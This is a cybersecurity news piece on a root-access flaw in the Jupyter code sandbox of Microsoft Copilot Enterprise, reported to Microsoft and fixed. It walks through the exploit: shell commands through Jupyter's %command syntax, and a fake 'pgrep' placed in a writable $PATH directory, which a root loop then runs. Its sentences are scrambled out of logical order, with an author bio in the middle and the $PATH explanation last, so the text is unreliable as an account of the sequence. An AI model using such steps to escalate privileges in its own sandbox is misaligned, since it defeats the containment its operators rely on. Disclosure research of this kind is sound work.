The vulnerability was detailed in a blog post published by Eye Security, which playfully likened interacting with Copilot to coaxing an unpredictable child. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. A critical vulnerability in Microsoft Copilot Enterprise allows unauthorized root access to its backend container. The issue originated from an April 2025 update that introduced a live Python sandbox powered by Jupyter Notebook, designed to execute code seamlessly. The researchers noted the exploit yielded “absolutely nothing” beyond fun, but teased further discoveries, including access to the Responsible AI Operations panel for Copilot and 21 internal services via Entra OAuth abuse. A key binary, goclientapp in /app, acted as the container’s interface, running a web server on port 6000 for POST requests to /execute endpoints. A critical oversight in line 28 involved a pgrep command without a full path, executed in a ‘while true’ loop every two seconds. This granted root access, enabling filesystem exploration, though no sensitive data or breakout paths were found, as known vulnerabilities were patched. Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. Eye Security reported the issue to Microsoft’s Security Response Center (MSRC) on April 18, 2025. Using Jupyter’s %command syntax, they executed arbitrary Linux commands as the ‘ubuntu’ user within a miniconda environment. The container featured a limited link-local network interface with a /32 netmask, utilizing an OverlayFS filesystem linked to a /legion path on the host. Exploiting this, researchers crafted a malicious Python script disguised as pgrep in the writable path. Microsoft has not publicly commented, but the swift fix demonstrates proactive security measures in evolving AI landscapes. Exploration revealed the sandbox’s core role in running Jupyter Notebooks alongside a Tika server. Simple JSON payloads, like {“code”:”%env”}, triggered code execution in the Jupyter environment. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications. Uploaded via Copilot, it read commands from /mnt/data/in, executed them with popen, and output to /mnt/data/out. Despite the user being in the sudo group, no sudo binary existed, adding an ironic layer to the setup. The sandbox mirrored ChatGPT’s model but boasted a newer kernel and Python 3.12, compared to ChatGPT’s 3.11 at the time. This relied on the $PATH variable, which included writable directories like /app/miniconda/bin before /usr/bin, where the legitimate pgrep resides.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 25 Jul 2025 14:10:14 +0000